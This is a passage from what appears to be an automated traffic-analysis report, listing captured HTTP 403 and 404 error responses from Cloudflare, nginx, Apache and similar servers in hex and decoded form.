6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:26:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ykXIQO4lD%2Bv1qPG3bR0EjlmsnfD2kY6FG%2FX3%2Bmx7elfzhRby7X0lfGcPlchgMZwc9iTNXzqX2zW15JHPI%2FIYzAIbAyzcRFn4bSo2AZFRFuGOlrOovlX27QzRkYuJE6r4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7450dc4a8c06-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv=
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 15 Sep 2023 05:26:22 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:22 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Sep 2023 05:26:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=16X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-east4,gcp-us-central1,gcp-us-central1X-Request-ID: ef2166d7-e59c-4ddf-ad1c-5e8fe1bf9b76CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qlyumVSPQLCEh1Sfoxe6d1Dd5ArMBMKxvp5RoUyFePONX585PKP3tak9JFLkmwl%2BxZFtFdCE8z264nOgWxrHP33hTHYHHvJ2mPg4DO0PkeRrttBv2rpgSbG5byDxvozdgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=70.999861Server: cloudflareCF-RAY: 806e746e69af43a5-EWRalt-svc: h3=":443"; ma=86400
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:26 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ou9AWEBrE3GsoSJr8LsLtB4j6du02IWohOXEZhTup7CMh1fpI%2FBpCSq8MS4br8DdXGpHKSQLChrniMMIewcHz363diqPEb0mtfxKqoy9oDmt%2B6aZTXgNVz23CUa%2BnZyK"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7471094f41d9-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:26 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H5rTuXZs64JhKhjE5B3clL61q3kDvoAyHCFUAKwZ8rkIREjo2OWUk4PrAuIRUCJUNU5gI%2Ft%2FYp1Cg5ttyP3dFXIU209vajGKSZ4WntRX%2FdqhhBR10GSQ57fsKIEfSDPt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e7471b9bb41d9-EWRalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:28 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Content-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 2cecc7c3c517333e6141822be82a3791fa889d8aServer: ZENEDGEX-Cache-Status: Date: Fri, 15 Sep 2023 05:26:30 GMTData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 37 32 30 37 22 2c 20 31 36 39 34 37 35 35 35 37 32 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 34 37 35 35 35 37 32 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 34 34 30 30 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 46 72 69 2c 20 31 35 20 53 65 70 20 32 30 32 33 20 30 35 3a 32 38 3a 33 30 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC7207", 1694755572, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1694755572 * 3.1415926535898; v = Math.floor(v); do
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:26:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5Jw%2F8NSHg73lNpUYoz9NxL55lTyHzNHpOsjiNtm6eduZW6R8GemWaRfcydU0BDwvJJyVtVJjAJIaGcrCJ0Pya93ekb4T%2B%2BFGj4AF1wFw9gfHLmj%2BrpdQzDWidUX8ue8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e748ceeb31921-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv=
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:26:39 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
